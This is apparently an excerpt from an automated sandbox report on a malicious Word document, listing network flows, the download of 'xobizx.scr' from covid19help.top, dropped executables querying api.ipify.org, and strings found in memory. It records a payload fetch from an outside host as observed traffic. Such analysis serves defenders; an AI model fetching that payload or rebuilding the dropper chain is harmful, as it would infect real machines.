                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: Joe Sandbox View | IP Address: 172.67.175.222
                    Source: Joe Sandbox View | IP Address: 104.26.12.205
                    Source: Joe Sandbox View | IP Address: 104.26.13.205
                    Source: Joe Sandbox View | IP Address: 104.26.13.205
                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | DNS query: name: api.ipify.org
                    Source: global traffic | HTTP traffic detected: GET /xobizx.scr HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: covid19help.top
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F50586BA-2E23-4FD0-A214-B66A4504F162}.tmp
                    Source: global traffic | HTTP traffic detected: GET /xobizx.scr HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: covid19help.top
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: unknown | DNS traffic detected: queries for: covid19help.top
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.000000000266B000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005466000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOR
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005466000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
